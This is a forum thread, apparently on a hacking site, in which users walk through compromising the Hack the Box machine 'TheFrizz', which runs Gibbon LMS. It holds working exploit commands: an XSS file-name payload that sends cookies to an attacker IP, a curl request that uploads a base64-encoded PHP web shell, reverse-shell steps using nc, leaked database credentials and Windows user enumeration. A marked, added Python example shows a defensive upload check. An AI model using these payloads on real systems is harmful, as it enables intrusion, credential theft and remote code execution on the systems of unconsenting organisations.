TheFrizz Hack the Box Season 7 (Windows Medium)
by RedBlock - Saturday March 15, 2025 at 03:36 PM
#21
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
Reply
#22
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

How did you manage to get a shell?
Reply
#23
(Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y" 

Uploaded the file but nothing is happening.

(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote:
(Mar 15, 2025, 09:01 PM)VoidNull Wrote: I got a reverse shell with this, and using the following

https://www.revshells.com/
Powershell #3 Base64 encoding

How did you manage to get a shell?

Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nc -lvnp XXX

I'm running around trying to find a user flag :D
Reply
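Added example, not part of any post in this thread and not Gibbon's own code: the request in post #23 works because the endpoint accepts a client-chosen `path` and writes whatever `img` decodes to. A server-side check that rejects it, assuming the endpoint is only meant to store PNG images; `check_upload` and the file-name policy are hypothetical.

```python
import base64
import binascii
import re

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Strict data-URI form; the value in the post uses "image/png;asdf," instead.
DATA_URI = re.compile(r"data:image/png;base64,([A-Za-z0-9+/]+={0,2})")
# Bare file name only: no directories, no extra dots, fixed .png extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.png")

# Values taken from the curl command quoted in post #23.
POST_IMG = "image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K"
POST_PATH = "shell.php"
# Constructed sample: PNG signature plus filler bytes, not a real image.
GOOD_IMG = "data:image/png;base64," + base64.b64encode(
    PNG_MAGIC + b"constructed").decode()


def check_upload(img, path):
    """Return a list of policy violations; an empty list means accept."""
    problems = []
    m = DATA_URI.fullmatch(img)
    if m is None:
        problems.append("img: not 'data:image/png;base64,<data>'")
        # Keep inspecting whatever follows the first comma so that
        # every violation is reported (useful for logging and alerting).
        payload = img.partition(",")[2]
    else:
        payload = m.group(1)
    try:
        data = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        data = b""
        problems.append("img: payload is not valid base64")
    if not data.startswith(PNG_MAGIC):
        problems.append("img: decoded bytes lack the PNG signature")
    if SAFE_NAME.fullmatch(path) is None:
        problems.append("path: must be a bare file name ending in .png")
    return problems


if __name__ == "__main__":
    for img, path in [(POST_IMG, POST_PATH), (GOOD_IMG, "rubric_0001.png"),
                      (GOOD_IMG, "../rubric.png"), (GOOD_IMG, "shell.php.png")]:
        print(path, "->", check_upload(img, path) or "accepted")
```

The signature test is only a floor, since a file can start with PNG bytes and still carry script text. What prevents execution is the server choosing the stored file name itself and keeping uploads in a directory where PHP is never interpreted.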
#24
I tried those credentials with system users using netexec smb * but no success
Reply
#25
(Mar 15, 2025, 09:09 PM)adrianhack Wrote: I tried those credentials with system users using netexec smb * but no success

It's not a domain user + NTLM is disabled
Reply
#26
(Mar 15, 2025, 09:07 PM)VoidNull Wrote:
Upload a web shell

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.

Then go to 
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]

Remember to listen to the port you declared on revshells.com.

nc -lvnp XXX

I'm running around trying to find a user flag :D

nope, doesn't work for me
Reply
#27
So, if anyone didn't get it, the host is the domain controller AFAIK.

The following users are present:

PS C:\Windows> net user
User accounts for \\FRIZZDC

-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice


And we might be able to leverage the following information about the Administrator

PS C:\Windows> net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/25/2025 2:24:10 PM
Password expires Never
Password changeable 2/25/2025 2:24:10 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/15/2025 6:56:18 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *Domain Admins *Domain Users
*Group Policy Creator *Schema Admins
*Enterprise Admins
The command completed successfully.
Reply
#28
Anyone managed to crack the hash of f.frizzle?
Reply
#29
(Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote:
nope, doesn't work for me

try to use urlencode... :)
Reply
#30
(Mar 15, 2025, 09:32 PM)eyalzaba Wrote:
(Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote:
nope, doesn't work for me

try to use urlencode... :)

nvm, that was dumb of me lol, it worked
Reply

